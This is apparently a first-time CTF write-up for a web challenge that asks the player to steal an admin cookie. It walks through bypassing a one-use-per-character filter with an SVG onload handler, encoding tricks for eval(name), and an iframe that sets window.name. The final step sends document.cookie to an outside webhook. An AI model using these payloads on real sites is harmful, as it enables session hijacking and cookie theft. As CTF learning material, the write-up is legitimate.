This is my first CTF challenge write-up so i’m not good at it
Entropian [web]
Solves: 4
Challenge: Steal Admin Cookie with XSS
Problem: You can use a character once
There is a reflected XSS in /entropian?input=Inject with UTF-8 charset and X-XSS-Protection is 0
As you can see it will remove the repeated characters </h1> it means let’s just forget about <script> and move on with event handlers
We can’t use <script src=/\domain> because we have to close the script tag </script> and we already used < and > characters
Using HTML imports <link rel=import href=\/domain> failed because there is too many characters
Then i managed to make script execution using <SVG/ONLoAD=alert(23)> the filter was case insensitive we could use a character twice, but this will just apply for the HTML
The things i tried and failed
eval(location.hash.substr(1)) → huh
document.body.innerHTML = name → we couldn’t send other urls to the admin except the challenge url
And then i thought about every JS dom and sink we could use but none of them were useful in our context they were too long for us
I was stuck with one payload eval(name) it was the shortest i can imagine but there is a problem too
eval(name) → The (e) and (a) characters are repeated
So I had to find 2 bypasses first using HTML entities for the (e) character
I used e for the (e) character but now we can’t use html entities again because we already used (&#x) characters so i tried unicode \u0061 but again we can’t use two (0) characters so ES6 unicode literals would help us \u{61}
And now i’m like oh shit both (e) and (a) hex codes start with 6 then i remembered about normal HTML entity ({)
The html entity for (e) was e ok cool now i’m fucked up, but for a moment i got smart and swiped the techniques for the characters, (a) entity was a and (e) unicode \u{65}. my final payload looked like:
OK now how we gone change the window name, we couldn’t send any arbitrary URLs, that means we should make a redirect, but how?!?
things i tried and failed badly (too many characters)
HTML redirect <meta http-equiv…>
<a href=//domain>
it was just 45 minutes before the CTF ended and i needed to find a fucking redirect, but i got a feeling why we should change the top window name? we can just make a child new window pointing to our domain, and that’s called iframe
Pseudo code:
point the iframe to our domain
set the frame name to an xss payload
redirect the frame to the page with eval(name)
My final payload:
<iframe src=/\PSHTA.ML>
The code in my domain:
It will set the window name to (location=”webhook/?”+document.cookie)
redirect to the xss page with the eval(name) then redirect to the webhook with the cookies
Just 36 minutes before the CTF ended and we got #2 because of it
Thanks for all the dudes in OpenToAll
Buh bye (^ _ ^)/